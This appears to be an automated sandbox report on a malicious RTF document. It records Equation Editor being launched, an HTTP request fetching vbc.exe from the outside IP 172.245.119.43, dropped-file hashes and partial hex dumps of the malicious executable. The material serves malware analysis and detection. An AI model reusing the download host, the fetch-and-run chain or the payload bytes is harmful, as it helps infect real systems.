                                              • Filename: uDZovIdfEJ.exe, Detection: malicious, Browse
                                              • Filename: q6JYc6gWld.exe, Detection: malicious, Browse
                                              • Filename: fw8ex1BNek.exe, Detection: malicious, Browse
                                              Reputation:moderate, very likely benign file
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jan 27 17:45:12 2022, mtime=Thu Jan 27 17:45:12 2022, atime=Thu Jan 27 17:45:18 2022, length=23753, window=hide
                                              Category:dropped
                                              Size (bytes):1014
                                              Entropy (8bit):4.552717489114195
                                              Encrypted:false
                                              SSDEEP:24:8qhLh/XTTc2J7iWMne118HYDv3qtQd7Qy:8a9/XTA2KvHHtUj
                                              MD5:F906D9B5F2E2642EF133CC86D6229B3A
                                              SHA1:6E4E1354A82BA9E6F1D101C79B9E881D7F9A98A5
                                              SHA-256:389A07403467A115C9A4428EBDFA68808688E026AF9AEBBCE5E488739A9A039F
                                              SHA-512:B78F3C81E20FCA2E9CED150722BEEC00A3359F5358E2766703204B7D4B6835944317DC60143982843B7F95B732E53615C51FD40AD9023FE6C31C078F54B08F05
                                              Malicious:false
                                              Preview:L..................F.... ...vT%.....vT%......H.......\...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1.....;T....Desktop.d......QK.X;T..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..\..;T.. .A3HAMZ~1.RTF..J......;T..;T..*.........................A.3.h.a.m.z.f.U.k.W...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\960781\Users.user\Desktop\A3hamzfUkW.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.3.h.a.m.z.f.U.k.W...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......960781..........D_....3N...W...9..g............[D_....3N...W...9..g...
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):72
                                              Entropy (8bit):4.798145057407475
                                              Encrypted:false
                                              SSDEEP:3:bDuMJl8WNup6YCmxWvfvp6YCv:bC6mzyfxzs
                                              MD5:AD7FCF7B5B0805821E5DD04A67240FBE
                                              SHA1:6715A52BE5339CA996A68A88563FE047D0F119D7
                                              SHA-256:3C86A616B2B27D891E0B7D0C7CF4916B42B179C36201A4D8328CF56499558F68
                                              SHA-512:851D82CD218CE096275E993C1FB73FA1A2662D98B6184929EC5CC5A10D940D3C9C1541CA929C72506DEA32AC2F14DB9A85F9BB917CD1A0267E13B747315F9D0D
                                              Malicious:false
                                              Preview:[folders]..Templates.LNK=0..A3hamzfUkW.LNK=0..[misc]..A3hamzfUkW.LNK=0..
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.5038355507075254
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                              Malicious:false
                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.5038355507075254
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                              Malicious:false
                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Category:dropped
                                              Size (bytes):96040
                                              Entropy (8bit):7.527902229290847
                                              Encrypted:false
                                              SSDEEP:1536:4/T2X/jN2vxZz0DTHUpouZZbJKDvTIz0u6zPEi+ctYyNv7F3oH8k29xE+1FC56:4bG7N2kDTHUpouZZbJKDM96wi+ctYU7N
                                              MD5:6EA8ECF670ED24734A3BE72B69BC5FD9
                                              SHA1:BCEAEF2755D79AB3DACBBF98B42D28BD307DC177
                                              SHA-256:7667E9078741E3AD3B07F45A2311B4C03A283CF4A060DB8341B91999FD0E8709
                                              SHA-512:332A74A4491436FBDD502FB8AB64F7D75CFDF9232F749E5C4C243A62A4B3B4BE99EE0B57F6326B3D242719001ADA64B4F43C563C89822381E9FC0EE21294ADEE
                                              Malicious:true
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................e.....@.............................................(............b...............................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...(...........................@..@................................................................................................................................................................................................................................................................................................................................................
                                              File type:Rich Text Format data, unknown version
                                              Entropy (8bit):4.651109750860811
                                              TrID:
                                              • Rich Text Format (5005/1) 55.56%
                                              • Rich Text Format (4004/1) 44.44%
                                              File name:A3hamzfUkW.rtf
                                              File size:23753
                                              MD5:30e90b61102da9d9132f6ccbfd286b73
                                              SHA1:949578725228909ffff575b8e2a7b397e6097585
                                              SHA256:084f59705fb0a98883454b511a2939f6ed91e9c04b7a2d7f8cb13ec834ec5215
                                              SHA512:8419f7a1581d862a7b17328da59ef3093473f1cb09fffa1abad12c4abcb668b373645f1e8539f22d4fdb62983e3867da73d8cbf4f3f9458f169d1755436caa03
                                              SSDEEP:384:mclEQg51J0ueRkFia4w686BuAuO8IYQ5sM+JNeG9HDFAdJY7:mc6Wpna4w686BuAuOFLNUeGhDKdJo
                                              File Content Preview:{\rtf6644.5$).8@@+?-+.&.&:5-8|?,4:&2%2.6!<5..&#:6*'8[%_7?*6-^,1?@7?.7;-?.|-2?%>.(.$_=-7)(|:??,51==0&?59..=4<.$,$[$?.8?9?<~%|.7~.>=?`045$.?7>9=~(%2>&*=7@3?+#/(.(<]=-;*/;%_?|$<01/.|,??'0]?</,../.[*>'%*))1?.<[?658+#-?|+2/|<.|~&7?-?]$0..%>*<,.-7~4;~^^0::?.?2?
                                              Icon Hash:e4eea2aaa4b4b4a4
                                              IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                              000001793hno
                                              100001738hno
                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 27, 2022 10:45:44.029140949 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.144798994 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.144865990 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.145282984 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.261739969 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.261764050 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.261782885 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.261799097 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.261814117 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.261830091 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.261846066 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.261872053 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.261888981 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.261894941 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.261904001 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.261923075 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.261926889 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.261929035 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.262329102 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.275983095 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.375817060 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.375849009 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.375868082 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.375885010 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.375895023 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.375901937 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.375917912 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.375921011 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.375921965 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.375940084 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.375941038 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.375956059 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.375957966 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.375972033 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.375977039 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.375989914 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.375994921 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.376010895 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.376013041 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.376027107 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.376029015 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.376045942 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.376046896 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.376060963 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.376064062 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.376079082 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.376082897 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.376096964 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.376099110 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.376115084 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.376116991 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.376135111 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.376147032 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.376151085 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.376168013 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.376168013 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.376183033 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.376200914 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.378350019 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490067005 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490103006 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490118027 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490130901 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490149021 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490160942 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490178108 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490195036 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490211964 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490228891 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490241051 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490253925 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490271091 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490282059 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490288019 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490307093 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490307093 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490312099 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490320921 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490326881 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490344048 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490345001 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490359068 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490364075 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490375996 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490381956 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490391970 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490401983 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490417004 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490422010 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490432978 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490439892 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490458012 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490461111 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490473986 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490473986 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490490913 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490494967 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490509987 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490513086 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490526915 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490526915 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490541935 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490545034 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490560055 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490561962 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490573883 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490578890 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490590096 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490596056 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490612984 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490613937 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490628004 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490629911 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490645885 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490648985 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490665913 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490679979 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490681887 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.490695000 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.490711927 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.492269993 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.492297888 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.492311954 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.492324114 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.492382050 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.492944002 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.604808092 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.604859114 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.604883909 CET8049167172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:45:44.604885101 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.604906082 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:44.604918957 CET4916780192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:45:45.593920946 CET4916780192.168.2.22172.245.119.43
                                              • 172.245.119.43
                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.2249167172.245.119.4380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampkBytes transferredDirectionData
                                              Jan 27, 2022 10:45:44.145282984 CET0OUTGET /2200/vbc.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 172.245.119.43
                                              Connection: Keep-Alive
                                              Jan 27, 2022 10:45:44.261739969 CET1INHTTP/1.1 200 OK
                                              Date: Thu, 27 Jan 2022 09:45:44 GMT
                                              Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                              Last-Modified: Tue, 25 Jan 2022 15:51:44 GMT
                                              ETag: "17728-5d66a0fd4b996"
                                              Accept-Ranges: bytes
                                              Content-Length: 96040
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 04 00 00 04 00 00 65 e3 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 28 0e 00 00 00 00 00 00 00 00 00 00 a0 62 01 00 88 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 28 0e 00 00 00 c0 04 00 00 10 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf*_9PfPgLPf*_;PfsVPf.V`PfRichPfPELZOaj-5@e@(b.texthj `.rdatan@@.data@.ndata``.rsrc(@@
                                              Jan 27, 2022 10:45:44.261764050 CET3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 08 4f 43 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 84 82 40 00 e9 42 01 00 00 53 56 8b 35 10 4f 43 00 8d 45 a4 57
                                              Data Ascii: U\}t+}FEuHOCHPuuu@BSV5OCEWPu@eEEPu@}e`@FRVVU+MM3FQNUMVTUFPEEPM\@EEPEPu
                                              Jan 27, 2022 10:45:44.261782885 CET4INData Raw: 00 e9 f9 16 00 00 8b 88 e0 4f 43 00 89 88 80 4f 43 00 e9 e8 16 00 00 8b 45 d8 8d 34 85 80 4f 43 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d dc 8b 44 85 d0 89 0e e9 d2 16 00 00 8b 45 d4 ff 34 85 80 4f 43 00 57 e9 31 16 00 00 8b 0d d0 3e 43 00 8b 35 50 82
                                              Data Ascii: OCOCE4OC3;#MDE4OCW1>C5P@;tuQE>C;PQjuP@nmjPEH;tZj\VZHf>ff;u9]tEtulDuD;t=uu
                                              Jan 27, 2022 10:45:44.261799097 CET5INData Raw: 1f 66 89 9f fe 07 00 00 e9 b8 11 00 00 8b 75 e4 53 e8 09 13 00 00 6a 01 8b f8 89 55 f0 e8 fd 12 00 00 59 3b f3 59 89 55 f0 75 08 3b f8 7c 08 7e 8a eb 12 3b f8 73 08 8b 45 dc e9 91 11 00 00 0f 86 76 ff ff ff 8b 45 e0 e9 83 11 00 00 6a 01 e8 cb 12
                                              Data Ascii: fuSjUY;YUu;|~;sEvEjjUuYUYE$L-@_+X;tSC#323;;u3;t;t3F;t3E
                                              Jan 27, 2022 10:45:44.261814117 CET7INData Raw: ff 75 ac eb 47 53 e8 fc 0d 00 00 8b f0 56 6a eb e8 eb 35 00 00 56 e8 66 3b 00 00 8b f0 3b f3 0f 84 6a 09 00 00 39 5d d8 74 21 56 e8 e6 49 00 00 39 5d d4 7c 0b 50 ff 75 f4 e8 a7 44 00 00 eb 0b 3b c3 74 07 c7 45 fc 01 00 00 00 56 ff 15 24 81 40 00
                                              Data Ascii: uGSVj5Vf;;j9]t!VI9]|PuD;tEV$@4jPpH;tvupDvQEffjuMEQPjHEf;fEVj@8@;EjHjEHuEVSuUt
                                              Jan 27, 2022 10:45:44.261830091 CET8INData Raw: 00 8d 44 00 02 83 fe 04 75 12 6a 03 e8 9a 08 00 00 59 a3 f0 b5 40 00 56 89 55 c8 58 83 fe 03 75 0f 68 00 18 00 00 57 53 ff 75 dc e8 ab 0d 00 00 50 57 ff 75 f0 53 ff 75 bc ff 75 08 ff 15 0c 80 40 00 85 c0 75 03 89 5d fc ff 75 08 e9 d3 00 00 00 68
                                              Data Ascii: DujY@VUXuhWSuPWuSuu@u]uhj3i;fMEQMWQSPV@3Au.}t9Mt}uEEt739]WE>ffM^h>j;YUfn9]Mt
                                              Jan 27, 2022 10:45:44.261846066 CET10INData Raw: e8 c7 36 00 00 57 ff 15 34 81 40 00 83 4d c8 ff 53 53 ff 75 08 ff 75 c8 e8 84 08 00 00 ff 75 08 8b f8 ff 15 24 81 40 00 6a f3 3b fb 5e 7d 13 6a ef 5e ff 75 c0 ff 15 70 81 40 00 c7 45 fc 01 00 00 00 56 e9 96 f8 ff ff 53 e8 23 03 00 00 8b f8 59 3b
                                              Data Ascii: 6W4@MSSuuu$@j;^}j^up@EVS#Y;=,OCUEi5(OC;|uVu:Q+MtjYUEuFP:NEM9]JW?S YU09]t"9]
                                              Jan 27, 2022 10:45:44.261872053 CET11INData Raw: 74 d0 ff 75 fc ff 15 10 80 40 00 6a 03 e8 ab 39 00 00 85 c0 75 1e ff 75 0c ff 75 08 ff 15 18 80 40 00 eb 1b ff 75 fc ff 15 10 80 40 00 b8 eb 03 00 00 eb 0b 6a 00 56 ff 75 0c ff 75 08 ff d0 5f 5e 5b c9 c2 0c 00 55 8b ec 81 ec 80 00 00 00 81 7d 0c
                                              Data Ascii: tu@j9uuu@u@jVuu_^[U}ujhju@@E}uLA$B;rPjdQ@PEh@PT@EPuD@EPhuh+3V39t$t B;tP8@5 B^95 B
